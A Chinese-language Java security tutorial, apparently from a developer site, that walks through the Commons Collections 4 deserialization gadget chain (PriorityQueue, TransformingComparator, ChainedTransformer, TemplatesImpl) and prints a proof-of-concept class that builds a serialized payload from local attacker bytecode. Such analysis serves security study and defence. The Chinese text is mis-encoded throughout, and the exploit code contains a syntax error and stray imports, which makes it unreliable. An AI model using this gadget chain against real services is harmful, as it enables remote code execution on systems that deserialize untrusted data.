java安全之CommonsCollections4詳解
引子
CC4簡(jiǎn)單來(lái)說(shuō)就是CC3前半部分和CC2后半部分拼接組成的,對(duì)于其利用的限制條件與CC2一致,一樣需要在commons-collections-4.0版本使用,原因是TransformingComparator類(lèi)在3.1-3.2.1版本中還沒(méi)有實(shí)現(xiàn)Serializable接口,無(wú)法被反序列化。
接下來(lái)讓我們仔細(xì)分析一下。
PriorityQueue
PriorityQueue是一個(gè)優(yōu)先隊(duì)列,作用是用來(lái)排序,重點(diǎn)在于每次排序都要觸發(fā)傳入的比較器comparator的compare()方法 在CC2中,此類(lèi)用于調(diào)用PriorityQueue重寫(xiě)的readObject來(lái)作為觸發(fā)入口
PriorityQueue中的readObject間接調(diào)用了compare() 而compare()最終調(diào)用了transform()
readobject()方法
private void readObject(java.io.ObjectInputStream s)
throws java.io.IOException, ClassNotFoundException {
// Read in size, and any hidden stuff
s.defaultReadObject();
// Read in (and discard) array length
s.readInt();
queue = new Object[size];
// Read in all elements.
for (int i = 0; i < size; i++)
queue[i] = s.readObject();
// Elements are guaranteed to be in "proper order", but the
// spec has never explained what that might be.
heapify();
}
重寫(xiě)了該方法并在最后調(diào)用了heapify()方法,我們跟進(jìn)一下:
private void heapify() {
for (int i = (size >>> 1) - 1; i >= 0; i--)
siftDown(i, (E) queue[i]);
}
這里的話需要長(zhǎng)度等于2才能進(jìn)入for循環(huán),我們要怎樣改變長(zhǎng)度呢。
這里用到的是該類(lèi)的add方法,將指定的元素插入此優(yōu)先級(jí)隊(duì)列。
heapify()調(diào)用了siftdown()方法
繼續(xù)跟進(jìn):
private void siftDown(int k, E x) {
if (comparator != null)
siftDownUsingComparator(k, x);
else
siftDownComparable(k, x);
}
可以看到判斷條件
if (comparator != null)
調(diào)用了
siftDownUsingComparator(k, x);
在siftDownUsingComparator()又調(diào)用了 comparator.compare()。
TransformingComparator
可以看到該類(lèi)在CC3的版本中不能反序列化,在CC4的版本中便可以了。
TransformingComparator是一個(gè)修飾器,和CC1中的ChainedTransformer類(lèi)似。
TransformingComparator里面存在compare方法,當(dāng)我們調(diào)用時(shí)就會(huì)調(diào)用傳入transformer對(duì)象的transform方法具體實(shí)現(xiàn)是this.transformer在傳入ChainedTransformer后,會(huì)調(diào)用ChainedTransformer#transform反射鏈。
問(wèn)題
1.就像剛才heapify里面所說(shuō)的
private void heapify() {
for (int i = (size >>> 1) - 1; i >= 0; i--)
siftDown(i, (E) queue[i]);
}
我們要進(jìn)入循環(huán)要修改值,通過(guò)add方法。
priorityQueue.add(1); priorityQueue.add(2);
2.initialCapacity的值要大于1
3.comparator != null
4.通過(guò)反射來(lái)修改值防止在反序列化前調(diào)用,就如之前的鏈一樣,我們到利用時(shí)再用反射修改參數(shù)。
類(lèi)似這個(gè)樣子:
Class c=transformingComparator.getClass();
Field transformField=c.getDeclaredField("transformer");
transformField.setAccessible(true);
transformField.set(transformingComparator,chainedTransformer);
我們先放置個(gè)反序列化前不會(huì)執(zhí)行這條鏈的隨便一個(gè)參數(shù):
TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
POC
package ysoserial;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.convert.TransformWriteField;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.LazyMap;
import org.apache.xalan.xsltc.trax.TrAXFilter;
import javax.xml.crypto.dsig.Transform;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;
public class cc4 {
public static void main(String[] args) throws Exception {
TemplatesImpl templates=new TemplatesImpl();
Class tc=templates.getClass();
Field nameField=tc.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates,"XINO");
Field bytecodesField=tc.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));
byte[][] codes=[code];
bytecodesField.set(templates,codes);
Field tfactoryField=tc.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
//
Transformer[] transformers=new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
instantiateTransformer
};
ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
priorityQueue.add(1);
priorityQueue.add(2);
Class c=transformingComparator.getClass();
Field transformField=c.getDeclaredField("transformer");
transformField.setAccessible(true);
transformField.set(transformingComparator,chainedTransformer);
serialize(priorityQueue);
unserialize("ser.bin");
}
public static void serialize(Object obj) throws Exception{
ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));
oss.writeObject(obj);
}
public static void unserialize(Object obj) throws Exception{
ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));
oss.readObject();
}
}
結(jié)語(yǔ)
這次給大家?guī)?lái)的是CC4鏈的簡(jiǎn)單分析,可以看到CC4鏈還是沒(méi)有脫離之前跟的鏈的影子,我們可以看到CC3的前半部分以及CC2的后半部分,需要注意的問(wèn)題的話就是版本問(wèn)題了吧還有上面提到的一些小細(xì)節(jié),至此CC鏈就快跟完了。
以上就是java安全之CommonsCollections4詳解的詳細(xì)內(nèi)容,更多關(guān)于java安全CommonsCollections4的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!
- java.util.Collections類(lèi)—emptyList()方法的使用
- 淺談Java中Collections.sort對(duì)List排序的兩種方法
- Java使用Collections.sort()排序的方法
- Java中的Collections類(lèi)的使用示例詳解
- Java中Collections.sort的使用
- Java的可變參數(shù)與Collections類(lèi)的功能示例解析
- Java中Collection與Collections的區(qū)別詳解
- Java Collection和Collections的區(qū)別
- Java中的集合工具類(lèi)Collections詳解
- Java中Collections.sort()排序方法舉例詳解
- Java中Collection和Collections的區(qū)別
相關(guān)文章
Mybatis使用useGeneratedKeys獲取自增主鍵
這篇文章主要為大家介紹了Mybatis使用useGeneratedKeys獲取自增主鍵示例詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2023-01-01
JUC系列學(xué)習(xí)工具類(lèi)CountDownLatch詳解
這篇文章主要介紹了JUC系列學(xué)習(xí)工具類(lèi)CountDownLatch詳解,文章圍繞主題展開(kāi)詳細(xì)的內(nèi)容介紹,具有一定的參考價(jià)值,需要的小伙伴可任意參考一下2022-08-08
SpringBoot JVM參數(shù)調(diào)優(yōu)方式
這篇文章主要介紹了SpringBoot JVM參數(shù)調(diào)優(yōu)方式,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2021-09-09
java 中 System.out.println()和System.out.write()的區(qū)別
這篇文章主要介紹了 java 中 System.out.println()和System.out.write()的區(qū)別.的相關(guān)資料,需要的朋友可以參考下2017-04-04
Java日常練習(xí)題,每天進(jìn)步一點(diǎn)點(diǎn)(19)
下面小編就為大家?guī)?lái)一篇Java基礎(chǔ)的幾道練習(xí)題(分享)。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧,希望可以幫到你2021-07-07
springboot+Oauth2實(shí)現(xiàn)自定義AuthenticationManager和認(rèn)證path
本篇文章主要介紹了springboot+Oauth2實(shí)現(xiàn)自定義AuthenticationManager和認(rèn)證path,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2017-09-09

